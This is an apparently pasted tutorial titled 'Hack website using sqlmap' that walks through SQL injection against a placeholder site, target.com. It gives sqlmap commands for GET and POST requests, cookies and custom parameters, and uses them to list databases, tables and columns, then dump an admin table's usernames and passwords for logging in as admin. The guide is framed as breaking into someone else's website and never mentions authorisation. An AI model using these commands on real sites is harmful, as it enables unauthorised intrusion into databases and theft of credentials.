SQLmap TutoRial

1. 3.65 KB
2. HACK WEBSITE USING SQLMAP SQL INJECTION TOOLS FULL TUTORIAL
3.  
4. how to use sqlmap on GET method
5.  
6.  
7. - fingerprinting
8.  
9. first you must have a vulnerable website for the target, if you was have a target now open sqlmap and type this command
10.  ./sqlmap.py -u "http://www.target.com/index.php?id=2"
11. sqlmap will detect vulnerable of your target and will tell you what the type of vulnerable and what is the database type. and if your target vulnerable go to next step.
12.  
13.  
14. - find database name
15.  
16. type this command to find database name
17.  ./sqlmap.py -u "http://www.target.com/index.php?id=2" --dbs
18. on this step, sqlmap will find the database name of your target, for example I use "web_db" for the database name.
19.  
20.  
21. - find tables name
22.  
23. after sqlmap find the databse name its time to find the tables name. use this command to find the table name
24.  ./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db --tables
25. there will show you some tables name inside "web_db" database, ok for example I use "tbl_admin" as  the tables name.
26.  
27.  
28. - find columns name
29.  
30.  its time to find what inside "tbl_admin" from "web_db" and we call it columns. to find columns type this command
31.  ./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin --columns
32. it will show you  the list of columns name, for example I find "user" and "password" columns.
33.  
34.  
35. - dump
36.  
37.  this command will dumped data from the columns, type this command
38.  ./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin -C user,password --dump
39. and I find "user = admin" and "password = adminpass". now go to the web and find the admin login.
40.  
41.  
42.  
43. how to use sqlmap on POST method
44.  
45.  
46. its the same way with GET method, its just that you have to insert POST data to the sqlmap. for example I have vulnerable site on the "login.php" path. the POST data is "id=admin&pwd=password&submit=login". how to find the POST data ? just use "Live HTTPheaders" its a firefox add ons.
47.  
48.  
49. - fingerprinting
50.  
51. its same way with GET method, just type this command
52.  ./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login"
53.  
54. - find database name
55.  
56.  ./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" --dbs
57.  
58. - find tables name
59.  
60.  ./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" -D web_db --tables  
61.  
62. - find columns name
63.  
64.  ./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" -D web_db -T tbl_admin --columns
65.  
66. - dump
67.  
68.  ./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" -D web_db -T tbl_admin -C user,password --dump
69.  
70.  
71.  include cookie
72.  
73.  
74. still same method but you just should insert the cookie
75.  ./sqlmap.py -u "http://www.target.com/index.php?id=2" --cookie="PHPSESSID=123asdqwe456blabla;user=admin"
76. or
77.  ./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" --cookie="PHPSESSID=123asdqwe456blabla;user=admin"
78.  
79.  
80.  
81. custom parameter
82.  
83.  
84. if you have a custom parameter to inject you can type "-p" like this command
85.  ./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" --cookie="PHPSESSID=123asdqwe456blabla;user=admin" -p "pwd"
86. sqlmap will inject "pwd" parameter. or you can give star"*" to the parameter to inject, like this
87.  ./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=*password&submit=login" --cookie="PHPSESSID=123asdqwe456blabla;user=admin"
88.  
89. cover
90.  
91.  
92. if you a windows users, dont use "./" to run it on cmd.
93.  
94. Go To Download Software: http://sqlmap.org/